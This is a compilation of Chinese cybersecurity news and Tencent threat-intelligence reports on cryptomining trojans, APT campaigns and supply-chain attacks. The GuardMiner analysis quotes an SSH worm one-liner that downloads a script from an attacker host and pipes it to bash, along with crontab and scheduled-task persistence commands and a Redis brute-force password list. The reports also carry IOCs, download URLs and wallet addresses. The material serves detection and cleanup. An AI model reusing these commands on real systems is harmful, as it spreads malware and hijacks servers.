介绍 TeamTNT是一个网络犯罪组织，其目标是包括Docker和Kubernetes实例在内的云环境。该组织先前已使用多种工具进行了记录，包括加密矿工和Amazon Web Services（AWS）凭证窃取蠕虫。 TeamTNT还被发现使用了恶意Docker镜像，该镜像可在Docker Hub上找到，以感染受害者的服务器。现在该小组正在发展。在Intezer观察到的近期攻击中，TeamTNT通过滥用Weave Scope来使用一种新技术，该工具可为用户提供对其云环境的完全访问权限，并与Docker，Kubernetes，分布式云操作系统（DC / OS）集成在一起，和AWS Elastic Compute Cloud（ECS）。攻击者安装此工具是为了映射受害者的云环境并执行系统命令，而无需在服务器上部署恶意代码。     … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1333/ 消息与封面来源：INTEZER   ，译者：芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

美国联邦当局近日又锁定了一位来自马萨诸塞州的 16 岁少年，指控他在今年 7 月发生的严重攻击事件中扮演重要角色。今年 7 月，当地警方逮捕了 17 岁的格雷厄姆·克拉克（Graham Clark of Tampa）在内的三名嫌犯，指控克拉克是本次攻击的幕后主谋。 图片为17 岁的格雷厄姆·克拉克 援引纽约时报报道，联邦特工已经确定了另一位在本次推特攻击事件中扮演更重要角色的少年。这位尚未公布姓名的少年似乎在今年 5 月与克拉克一起参与了推特攻击的策划活动。 根据纽约时报报道，这名来自马萨诸塞州的 16 岁少年还可能利用 vishing（语音钓鱼）技术入侵了该社交媒体平台更为敏感的后台系统。 7月15日，这两名少年伙同其他几名嫌犯利用窃取的推特员工凭证，发起了一场大规模的比特币骗局，利用Joe Biden, Apple, Elon Musk 和 Kanye West 等知名账号进行诈骗。     （稿源：cnBeta，封面源自网络。）

恶意网络攻击者对软件供应链的攻击，正向“上游”组件蔓延，再借助开源软件的“信任链”和影响力，导致的结果之一就是破坏性更大。Sonatype 的《2020软件供应链报告》报告提出，下一代软件供应链攻击正在到来，显著特点就是刻意针对“上游”开源组件，进行更主动的攻击。而此类攻击出现的背景正是开源组件和容器的广泛采用。 软件供应链及攻击 软件供应链一词常出现在科技公司和研究人员的表述中，Dell EMC 的产品管理总监 John Mark Walker 曾通过对比硬件供应链，描述传统软件供应链。 他认为，硬件的供应链是来源于不同地区的、许多不同合作伙伴的零部件，传统软件供应链大多是定义企业内部制作软件，以及从第三方获得一些商业软件的过程。在此模式下，供应链上的大部分来源于公司内部，可能来自多个工程团队，一小部分软件来源于公司外部，因此供应链主要由内部产品定义，工程团队负责管理。另外来自第三方供应商的软件在组合时需要做合规检查，获得许可。 （简单的、一般的传统软件供应链） 另一个流传较广的定义是按照阶段划分，认为软件供应链通常包括三个阶段：软件研发阶段、软件交付阶段、软件使用阶段。 这种划分通常也有助于区分不同种类的软件供应链攻击，许多大型科技公司对此都有专门的讨论。腾讯安全平台曾总结软件供应链攻击环节，阿里巴巴的工程师也曾例举不同阶段的攻击面： 一是生产节点被攻击，包括软件开发涉及到的软硬件开发环境、开发工具、第三方库、软件开发实施等等，软件开发实施的具体过程还包括需求分析、设计、实现和测试等，软件产品在这一环节中形成最终用户可用的形态。软件研发阶段的攻击面包括 IDE 开发工具污染攻击、三方库漏洞和后门攻击、直接源码污染攻击。 二是交付阶段，交付节点被攻击，如软件上线的平台、硬件。用户通过软件官网、公共仓库、在线商店、免费网络下载、购买软件安装光盘等存储介质、资源共享等方式获取到所需软件产品的过程。受攻击对象比如著名的软件下载站、Python 官方镜像源、Github 等。 攻击面如软件存储替换和篡改攻击、传输劫持和捆绑下载攻击。 三是软件使用阶段，使用节点即软硬件的使用者被攻击。使用软硬件产品的整个生命周期，包括产品更新升级、维护等过程。 攻击面包括升级劫持污染攻击、运行环境后门和了漏洞攻击、三方库 0Day 漏洞攻击。 以上是从定义方面，较为宽泛地看传统软件供应链以及一般软件供应链攻击。但随着云原生和开源的发展，一些新的看法与攻击出现了。 开源与云原生时代的软件供应链 前文 John Mark Walker 所说的传统软件供应链，是在对比包含更多开源组件的软件供应链。John Mark Walker 认为，随着开源软件应用在增多，情况已经变得混乱了：未经验证的许可证、未经测试的仓库、以及狂野的开发者，这些要素使得软件供应链看上去似乎不可管理。开源导致至少增加了一个额外的层次： 某个角度看，开源组件插入到产品中，和第三方商业组件插入到产品中，并没有本质差别。但实际上，关于上游开源组件，多数源代码仓库没有任何商业保证。此时要么是建立自己内部的审核代码和应用产品管理流程的方法，或者是靠中间厂商，即采用开源软件的商业发行版，如 RedHat 和 SUSE 提供的 Linux 企业版产品。 与开源密切相关，并改变传统软件供应链的还有云原生。容器概念和 Docker、Kubernetes 等项目的出现，改变了软件的交付方式，进而影响到软件供应链。 阿里技术团队曾总结容器和 Kubernetes 的引入带来的安全软件供应链管理变化： 发布和迭代更加频繁，容器的易变性也使得安全风险稍纵即逝； 更多的不可控三方依赖，一旦一个底层基础镜像有了安全漏洞，会向病毒一样传递到上层； 更大范围的全球快速分发，在分发过程中的攻击也会使得在末端执行的时造成大规模安全风险。 《2020软件供应链报告》中提到的“下一代软件供应链”攻击的变化，也正是基于开源和与原生的发展——下一代软件攻击数量激增的背景是，开源加速了创新，也带来大规模的使用，到2020年，世界各地的开发者对开源软件组件和容器的需求，将超过1.5万亿个。同时，攻击也正在积极针对开源项目。 下一代软件供应链攻击已主动向“上游”感染 供应链成为攻击媒介已经不是新发现了。Symantec 的调查显示，2017年供应链网络攻击激增200%；2018年，CrowdStrike 的供应链安全性调查结果显示，80％的 IT 专业人员认为软件供应链攻击将是企业组织在未来三年中将面临的最大网络威胁之一…… 这次的《2020软件供应链报告》提出了“下一代”的软件供应链攻击正在到来，特点是攻击更加主动，波及范围更广。 数据显示，在过去12个月，旨在大举渗透开源的下一代网络攻击数量增加了430%。攻击者正在利用软件供应链达成杠杆和规模效应。同时，下一代的软件供应链攻击更加险恶，因为攻击者不再是等待公开披露的开发源码漏洞，而是主动、积极地将恶意代码注入为全球供应链提供信息的开源项目，通过感染“上游”组件，向“下游”扩散。 出现此种情况的可能原因有三个： 开源项目是协作的，有时难区分良好和恶意的社区成员； 开源项目通常包含来自其他开源项目成百上千的依赖项，依赖项中可能含有已知漏洞； 开源精神是建立在全球社区的“共同信任”之上，这便于攻击者轻松达成目的。 最常见的是类型攻击，这是一种间接攻击向量。此类攻击在搜索流行组件时攻击开发人员，是他们犯一些无辜的错误。如开发人员想要获取“Iodash”源代码，却意外地输入了“Iodahs”，那么他们可能会意外地安装一个名称类似的恶意组件。 另一常见的是恶意代码注入。如今年5月，GitHub 安全博客警告了针对 Apache NetBeans IDE 项目的开源供应链攻击 Octopus Scanner。最终统计显示，有26个开源项目被植入了 Octopus Scanner 后门。一旦感染，恶意程序会寻找用户开发系统上的 NetBeans 项目，然后将恶意负荷嵌入项目文件，每次构建都会执行恶意负荷。 如何使开源软件供应链更可信 事实上，随着软件供应链攻击的增加，企业和开发者也需要做些什么来保障安全，提高软件供应链的可信度。 《2020软件供应链报告》认为，选择开源项目应该是企业软件开发团队的重要战略决策。包括识别模范的开源供应商，具有更新依赖性的项目更加安全。报告建议项目团队应该力争每年至少发布4个版本，并在每个版本中升级至少80%的依赖项，更高频率的依赖更新会带来更高的质量和更安全的代码。 报告还指出，面对更加恶意的软件供应链攻击，防御的速度仍是关键。一直以来，所有开发者和企业都牢记面对恶意攻击时，要积极响应。不过该报告此处尤指开源软件，组织必须建立起一个“快速升级态势”，这样他们就可以通过发现和修复生产应用程序中、脆弱的开源依赖关系，来快速响应新的漏洞披露。 除了报告中提到的“快速升级态势”，态势感知也是近年来常被用于确保网络安全的方式。 “态”强调当前状态，“势”强调未来发展的趋势。网络安全领域的态势感知，最重要的是全局视角提升对威胁的发现识别、理解分析、响应处置。态势感知基于基于环境的、动态、整体地洞悉风险的能力，以大数据为基础，最终是为了决策与行动，是预测能力的落地，也可看做一种“事前”发现的方式。 具体方式包括通过收集云上安全组件信息、关联分析组件提供的海量日志等，全面感知威胁，得出可被理解的安全事件。又或是通过人工智能技术，深度挖掘数据，预测云上资产可能面临的风险。 最后报告再次提及开源及其安全的重要度：10个开源软件下载中有1个是脆弱的，而开源组件占到了现代应用的90%。其研究发现生产力不一定要以降低安全性为代价。在供应端，通过对部分开源项目的研究发现，频繁的代码更新、依赖更新和发布会带来更好的结果，更新越频繁，开源项目通常越安全。 综上，无论是供应端还是需求端，建议都是快速行动，包括快速更新、快速应对。开源或许在某种层面上导致风险更大，但合理利用开源的协同开发，快速发布，也是解决这些风险的绝佳方式。     (稿源：OSCHINA，封面来自网络）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/oFnOODmShuuE5OUfbZKiEQ   一、背景 腾讯安全威胁情报中心检测到ThanatosMiner（死神矿工）挖矿木马利用BlueKeep漏洞CVE-2019-0708攻击传播。攻击者将公开的Python版本BlueKeep漏洞利用代码打包生成scan.exe，大范围扫描随机生成的IP地址进行探测和攻击。 漏洞利用成功后执行shellcode下载C#编写的木马svchost.exe，然后利用该木马下载门罗币挖矿木马以及攻击模块进行下一轮攻击。因Payload程序Assembly Name为ThanatosCrypt，将该挖矿木马命名为ThanatosMiner（死神矿工）。 2019年5月15日，微软发布了针对远程桌面服务（Remote Desktop Services ）的关键远程执行代码漏洞CVE-2019-0708的安全更新，该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞，便可以在目标系统上执行任意代码，该漏洞的触发无需任何用户交互操作——意味着，存在漏洞的电脑只需要连网，勿须任何操作即可能遭遇远程黑客攻击而沦陷。BlueKeep漏洞（CVE-2019-0708）是所有安全厂商高度重视的高危漏洞。 该漏洞影响旧版本的Windows系统，包括： Windows 7、WindowsServer 2008 R2、Windows Server 2008、Windows 2003、Windows XP。Windows 8和Windows10及之后版本不受此漏洞影响。 腾讯安全系列产品已全面支持对ThanatosMiner（死神矿工）挖矿木马的查杀拦截，腾讯安全专家强烈建议用户及时修补BlueKeep漏洞，避免电脑被挖矿木马自动扫描攻击后完全控制。 二、样本分析 攻击模块scan.exe通过pyinstaller打包Python代码生成exe，使用pyinstxtractor.py可解压出Python编译后的无后缀文件scan。pyinstaller在打包pyc的时候会去掉pyc的magic和时间戳，而打包的系统库文件中这两项内容会被保留，所以可以查看解压出的系统库中的magic和时间戳并添加到scan的文件头，然后将其命名为scan.pyc，并通过uncompyle6进行反编译，可以还原的Python代码scan.py。 分析发现，Python3版本编译后的二进制文件开头为e3 00 00 00 00 00 00 00，Python2版本通常为63 00 00 00 00 00 00 00。 scan.py获取本机同网段IP地址，以及随机生成的外网IP地址扫描3389端口。 利用公开的BlueKeep漏洞CVE-2019-0708攻击代码进行攻击。 漏洞攻击成功执行shellcode命令，在%Temp%目录下创建DO.vbs，下载执行http[:]//download.loginserv.net/svchost.exe。 Payload木马svchost.exe采样C#编写，代码经过Dotfuscator混淆处理，可使用开源工具De4dot去除部分混淆，程序的Assembly Name为ThanatosCrypt。 运行后会检测以下注册表项和磁盘文件判断是否在虚拟机中运行。 SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers SOFTWARE\VMWare, Inc.\VMWare Tools SOFTWARE\Oracle\VirtualBox Guest Additions C:\windows\Sysnative\Drivers\Vmmouse.sys C:\windows\Sysnative\Drivers\vmci.sys C:\windows\Sysnative\Drivers\vmusbmouse.sys C:\windows\Sysnative\VBoxControl.exe 通过IsDebuggerPresent() 、IsDebuggerAttached()、CheckRemoteDebuggerPresent()判断进程是否被调试。 若无虚拟机环境、未处于被调试状态则继续执行。 然后svchost.exe继续下载http[:]//download.loginserv.net/scan.exe进行扫描攻击，以及下载http[:]//download.loginserv.net/xmrig.exe挖矿门罗币。 IOCs Domain download.loginserv.net MD5 URL http[:]//download.loginserv.net/svchost.exe http[:]//download.loginserv.net/xmrig.exe http[:]//download.loginserv.net/scan.exe http[:]//download.loginserv.net/mine.exe   参考链接 1.Windows远程桌面服务漏洞预警（CVE-2019-0708） https://mp.weixin.qq.com/s/aTSC0YR1dxSUHVJ3pnZezA 2.漏洞预警更新：Windows RDS漏洞（CVE-2019-0708） https://mp.weixin.qq.com/s/OEjI776O3cTjtMrsPdtnpQ 3.Windows远程桌面漏洞风险逼近，腾讯安全提供全面扫描修复方案 https://mp.weixin.qq.com/s/ckVHic2oChjZmVvH_zmsHA 4.Windows远程桌面服务漏洞（CVE-2019-0708）攻击代码现身 https://mp.weixin.qq.com/s/bcANAbzONFyrxqNMssTiLg 5.RDP漏洞(BlueKeep)野外利用预警，腾讯御知免费检测 https://mp.weixin.qq.com/s/G2ZS7rKkYYvEtbxUm0odGA 6.永恒之蓝下载器木马再升级，集成BlueKeep漏洞攻击能力 https://mp.weixin.qq.com/s/_teIut43g6In9YZ7VQ2f7w

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/-nUrNilr-iq7kbmopaqXwA   概述 腾讯安全威胁情报中心检测到跨平台挖矿木马GuardMiner近期十分活跃，该木马会扫描攻击Redis、Drupal、Hadoop、Spring、thinkphp、WebLogic、SQLServer、Elasticsearch多个服务器组件漏洞，并在攻陷的Windows和Linux系统中分别执行恶意脚本init.ps1，init.sh，恶意脚本会进一步下载门罗币挖矿木马、清除竞品挖矿木马并进行本地持久化运行。在Linux系统上利用SSH连接和Redis弱口令爆破进行内网扩散攻击。因挖矿守护进程使用文件名为sysguard、sysguerd、phpguard，腾讯安全威胁情报中心将该挖矿木马命名为GuardMiner。因该病毒已具备蠕虫化主动攻击扩散的能力，近期已有较多企业中招。 样本分析 1、init.ps1攻击Windows系统，从服务器下载挖矿进程phpupdate.exe，配置文件config.json，扫描攻击进程networkmanager.exe，持久化脚本newdat.ps1，挖矿守护进程phpguard.exe，清理脚本clean.bat。 2、init.sh攻击Linux系统，从服务器下载挖矿进程phpupdate，配置文件config.json，持久化脚本newdat.sh，扫描攻击进程networkmanager，挖矿守护进程phpuguard。 3、门罗币挖矿进程phpupdate.exe占用CPU接近100%： 挖矿使用的三组矿池和钱包分别如下： xmr.f2pool.com:13531 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 xmr-eu2.nanopool.org:14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 randomxmonero.hk.nicehash.com:3380 3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520 4、清除竞品挖矿木马文件： 5、phpguard.exe、phpguard负责守护挖矿进程，进程退出后立即重启： 6、在Windows系统上通过安装计划任务持久化，每隔30分钟执行一次newdat.ps1： SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\newdat.ps1" /MO 30 /F 在Linux系统上通过定时任务持久化，每隔30分钟执行一次newdat.sh： crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1"   7、在Linux系统上还会通过sshown_hosts获取登录过的机器IP，建立SSH连接并执行远程shell脚本is.sh，进行内网扩散攻击： `if [ -f /root/.sshown_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.sshown_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘curl -o-  http[:]//global.bitmex.com.de/cf67355a3333e6/is.sh | bash >/dev/null 2>&1 &’ & done fi` is.sh接着安装扫描工具Pnscan和Masscan针对全网段IP范围进行6379端口(Redis服务)扫描，并通过Redis弱口令爆破（密码字典：redis、root、oracle、password、p@aaw0rd、abc123、abc123!、123456、admin）以及未授权访问漏洞感染执行init.sh： 8、Windows系统上执行networkmanager.exe，Linux系统上执行networkmanager，开启漏洞扫描和利用攻击，针对以下服务器组件，攻击成功后在Windows系统执行Powershell脚本，在Linux系统执行shell脚本进行进行感染:Redis未授权访问漏洞； Drupal框架CVE-2018-7600漏洞； Hadoop未授权漏洞； Spring框架CVE-2018-1273漏洞； thinkphp框架TP5高危漏洞； WebLogic框架CVE-2017-10271漏洞； SQLServer框架xcmd_shell、SP_OACreate注入提权漏洞； Elasticsearch框架CVE-2015-1427、CVE-2014-3120远程代码执行漏洞。   病毒清除建议： 1.Windows系统用户推荐使用腾讯T-sec终端安全管理系统（腾讯御点）查杀； 2.Linux系统用户可按以下步骤手动清除： a.检查tmp、etc目录下是否具有以下文件，杀死对应的进程并删除文件： /tmp/phpupdate /tmp/networkmanager /tmp/phpguard /tmp/newdat.sh /tmp/config.json /etc/phpupdate /etc/networkmanager /etc/config.json /etc/newdat.sh b.检查crontab计划任务中是否包含执行”/tmp/newdat.sh”相关代码，如有删除该定时任务。 IOCs IP 185.247.117.64 209.182.218.161 178.157.91.26 146.71.79.230 43.245.222.57 URL http[:]//185.247.117.64/cf67355/phpupdate http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate http[:]//185.247.117.64/cf67355/newdat.sh http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.sh http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager http[:]//185.247.117.64/cf67355/phpguard http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard http[:]//185.247.117.64/cf67355/phpupdate.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate.exe http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager.exe http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager.exe http[:]//185.247.117.64/cf67355/newdat.ps1 http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.ps1 http[:]//185.247.117.64/cf67355/phpguard.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard.exe http[:]//185.247.117.64/cf67355/clean.bat http[:]//global.bitmex.com.de/cf67355a3333e6/clean.bat    

6月10日，我们发现了一个伪装成简历的恶意Word文档，它使用模板注入来删除一个Net Loader。这是我们认为是APT攻击的一个部分，在最后阶段，威胁者使用Cobalt Strike的C2特性下载最终的有效载荷并执行C2通信。 这次袭击因为它的躲避技巧显得特别聪明。如我们观察到在执行来自恶意Word宏的有效负载时存在故意延迟。此外，通过将shell代码隐藏在一个无害的 JavaScript中并在不触及磁盘的情况下加载它，APT可以进一步阻止安全检测。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1248/     消息来源：malwarebyte，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

去年年底，我们发现了针对欧洲和中东地区的航空航天和军事公司的攻击活动，该攻击在2019年9月至2019年12月非常活跃。通过对两家受影响的欧洲公司的深入调查，我们对其攻击活动进行了深入了解，发现了之前从未被记录的恶意软件。 本文将对攻击活动的具体情况进行分析，完整的分析报告可查看白皮书《运营感知：针对欧洲航空航天和军事公司的针对性攻击》。 基于名为Inception.dll的相关恶意软件样本，我们将这些攻击称为“操作感知”，发现这些攻击活动具有很高的针对性。 为了危及目标，攻击者以诱人的虚假工作机会为幌子。在取得信任后，开始部署了自定义的多级恶意软件以及修改过的开源工具。除此之外还采用“陆上生存”策略，滥用合法工具和操作系统功能，使用多种技术来避免检测（其中包括代码签名、定期对恶意软件进行重新编译以及冒充合法公司来进行诈骗）。 我们调查了解到该行动的主要目标是间谍活动。但是在调查的某个案例中发现攻击者试图通过商业电子邮件折衷攻击(BEC)将访问受害者电子邮件帐户的权限货币化。虽然我们没有找到有力的证据将攻击与已知的威胁行为者联系起来，但发现了一些可能与Lazarus集团有联系的线索（其中包括定位目标、开发环境和使用的技术分析）。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1248/     消息来源：welivesecurity，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/QBkjAGuGBIZ7yzDNEYhxOg   概述 “贪吃蛇”挖矿木马曾在2019年4月被腾讯安全团队发现，因其在感染服务器后即会清除其他挖矿木马独占服务器资源而得名。“贪吃蛇”挖矿木马团伙主要针对MS SQL服务进行爆破弱口令攻击，爆破成功后会进行提权攻击获得系统权限，然后植入门罗币挖矿木马以及大灰狼远控木马。 “贪吃蛇”挖矿木马新变种的攻击流程 该团伙在2019年也对木马进行过一次更新，但第二个版本中被其他团队植入了后门（黑吃黑也是传统套路）。腾讯安全团队本次捕获的“贪吃蛇”挖矿木马新版在攻击流程上与前面略有区别。首先病毒对提权工具进行更新，抛弃了2015及以前的提权漏洞，引入2019年新的提权漏洞，病毒爆破成功之后提权获得系统权限的概率得以大幅提升。 “贪吃蛇”新版本清理的竞品挖矿木马也比旧版更多, 病毒还会添加Windows防火墙规则阻止其他挖矿木马入侵。攻击流程上也有所简化，不再借用第三方大厂的白文件，而是直接劫持系统进程或服务进行攻击。 腾讯安全T-Sec终端安全管理系统及腾讯电脑管家均可查杀该病毒，腾讯安全专家建议企业网管尽快纠正MS SQL服务器存在的弱口令风险，避免黑客远程爆破成功。 详细分析 攻击团伙对MS SQL服务器爆破成功后，会直接下载提权模块攻击以获取系统最高权限。与第一版贪吃蛇不同的是，第一版提权完成后会从网络上下载后续功能模块，而新版中在提权模块中直接包含后续的功能模块，大部分内嵌在PE中。 新版内嵌PE会存放在数据段 而旧版本是内嵌在资源段中 流程开始后首先释放提权模块，罗列了一下新版贪吃蛇与旧版使用的提权工具区别，提权漏洞升级了。 旧版本： 新版本： 提权工作完成后，释放SQLA.exe文件，该文件内置6个PE文件，其中2个文件是密文形式存放，逐个分析其功能。 Rundllexe.Dll：这个dll有内嵌x64版本，会被注册为打印机程序 Dll启动rundllexe.Exe Rundllexe.exe启动后把大灰狼远控注入到svchost中 大灰狼模块被释放到C:\Windows\MpMgSvc.dll中 C2: down.361com.com 备份rundll代码到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ODBC\Rundll 接着下载x64.exe，hxxp://124.160.126.238/1.exe，这个模块主要用来投递挖矿木马，入口处通过修改Windows防火墙规则，阻止其他挖矿木马入侵。 解密出active_desktop_render.dll释放到c:\windows\help\ active_desktop_render.dll会把自身注册为服务，服务名GraphicsPerf_Svcs active_desktop_render.dll内置一个PE文件，解密后得到DeskTop EXE.主要负责投递挖矿木马，首先下载hxxp://118.45.42.72/Update.txt，文件中描述了挖矿木马名称及大小。 还需要根据配置描述，清除其他竞品挖矿木马 “加固清理”之后下载挖矿木马hxxp://www.362com.com/32.exe，并设置挖矿启动项，挖矿木马使用的文件名和系统文件名一样，以便伪装。 TrustedInsteller.exe WmiApSvr.exe WUDFhosts.exe HelpSvc.exe 劫持这4个系统文件，提高存活几率： 矿池及钱包仍然异或加密存储在文件中 矿池：pool.usa-138.com:80 钱包：4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S 清除其他挖矿木马也更加全面 IOCs MD5 3841eed7224b111b76b39fe032061ee7 a865ec970a4021f270359761d660547c 70e694d073c0440d9da37849b1a06321 4a72e30c0a582b082030adfd8345014f 645564cf1c80e047a6e90ac0f2d6a6b7 ce614abf6d6c1bbeefb887dea08c18a3 f03f640de2cb7929bbbafa3883d1b2a9 5d2e9716be941d7c77c05947390de736 3a1e14d9bbf7ac0967c18a24c4fd414b dc60a503fb8b36ab4c65cdfa5bd665a1 9450249ae964853a51d6b55cd55c373e f4f11dc6aa75d0f314eb698067882dd5 18936d7a1d489cb1db6ee9b48c6f1bd2 b660ad2c9793cd1259560bbbfbd89ce6 2ee0787a52aaca0207a73ce8048b0e55 URLs hxxp://www.362com.com/32.exe hxxp://www.362com.com/64.exe hxxp://118.45.42.72/Update.txt hxxp://118.45.42.72/22.exe hxxp://www.362com.com/Update.txt hxxp://124.160.126.238/1.exe hxxp://124.160.126.238/tq.exe hxxp://124.160.126.238/11.exe hxxp://124.160.126.238/Down.exe hxxp://124.160.126.238/MSSQL.exe Domain www.361com.com www.362com.com 22ssh.com IP 124.160.126.238 （ZoomEye搜索结果） 118.45.42.72 （ZoomEye搜索结果）

2014年一个名为Turla Group的恶意软件组织消息出现，爱沙尼亚外交情报局推断它源于俄罗斯，代表俄罗斯联邦安全局（FSB）进行运作，该组织核心恶意软件也被公开描述为第一个滥用第三方程序来禁用DSE的案例。在Windows Vista中引入了这种安全机制，以防止未签名的驱动程序加载到内核空间。Turla利用了签名的VirtualBox驱动程序——VBoxDrv.sysv1.6.2来停用DSE，然后对未签名的有效负载驱动程序进行加载。 然而，这个漏洞有一些混淆，它被称为CVE-2008-3431。Turla使用的漏洞实际上滥用了两个漏洞，其中只有一个在前面提到的CVE中被修复过。另一个漏洞与CVE-2008-3431一起用在第一个攻击版本中，第二个攻击版本大约在2014年引入了内核模式恶意软件，其只使用了未修补的漏洞，我们将在后面详细讨论。 2019年2月，Unit 42发现了尚未知晓的威胁因素（信息安全社区不知道），发现第二个未修补的漏洞不仅可以利用VirtualBox VBoxDrv.sys驱动程序 v1.6.2，还可以利用 v3.0.0以下的所有其他版本。此外我们研究发现这个未知的参与者利用VirtualBox驱动程序2.2.0版，在2017年攻击至少两个不同的俄罗斯组织。我们猜测这样做是因为驱动程序版本2.2.0并不易受攻击，因此很可能不会被安全公司发现。由于没有发现其他受害者，我们认为这是一个非常罕见的恶意软件，仅用于目标攻击。 操作者使用了一个之前未知的恶意软件家族，我们称之为AcidBox。由于该恶意软件的复杂性、稀有性以及它是一个更大的工具集的一部分这一事实，我们相信它被高级威胁参与者用于定向攻击。如果攻击者仍然活跃的话，这个恶意软件很可能今天仍在使用。但是，我们预计它在一定程度上被重写了。根据我们掌握的信息，我们认为除了使用过的漏洞之外，这个未知的威胁因素与Turla无关。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1247/     消息来源：paloaltonetworks，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

外媒9To5Mac报道，主要的移动运营商（T-Mobile、Metro、Verizon、AT&T、Sprint等均遭遇大规模DDos攻击。 这些攻击的潜在源头仍然不得而知。人气颇高的“匿名者”Twitter帐户@YourAnonCentral推测它“源头可能是。” 大量用户前往运营商官网及其他社交平台发帖催促维修，大量美国用户投诉无法正常通讯，例如无法正常拨打电话和接听电话。网络连接更是非常不稳定，他们因此而耽误了不少的工作。 此次美国运营商网络瘫痪覆盖地区主要为迈阿密、亚特兰大、休斯顿、芝加哥、纽约市布鲁克林区、洛杉矶等地。 T-Mobile 技术总裁 Neville Ray对昨日突发的通讯故障进行解释： 尽管语音和短信业务的投诉遍布四大运营商（包括 AT&T、Verizon、甚至 Sprint），但事实证明只有 T-Mobile 真正遭遇了技术问题。其他运营商客户发现自己无法拨通 T-Mobile 用户的号码，结果误以为自己所在的网络线路也不通。 虽然 T-Mobile 承认遇到故障，但它并没有深入解释到底是如何波及竞争对手的网络客户的。 奇怪的是，T-Mobile 的数据服务没有受到影响，人们依然可以通过即时消息（IM）或视频聊天进行沟通。 经过紧张的修复，太平洋标准时晚 10:03，T-Mobile 报告称所有服务均已恢复正常。 现在，T-Mobile 技术总裁 Neville Ray 试图解释故障背后的基础细节。他表示，尽管该公司设置了冗余，但某家租用光纤供应商的线路遇到了问题，结果导致备份失效和系统超载。 在此期间，用于语音呼叫（尤其是 VoLTE 业务）的核心网络遭遇了容量瓶颈。Neville Ray 对实际业务未能达到预期的卓越水准而向遭受不便的客户深表歉意。 按照T-Mobile的解释，是光纤中断造成系统超载，影响了四大运营商的语音业务，这恰巧也解释了流量突发的原因不是DDos攻击。     （稿源：网易科技，封面源自网络。）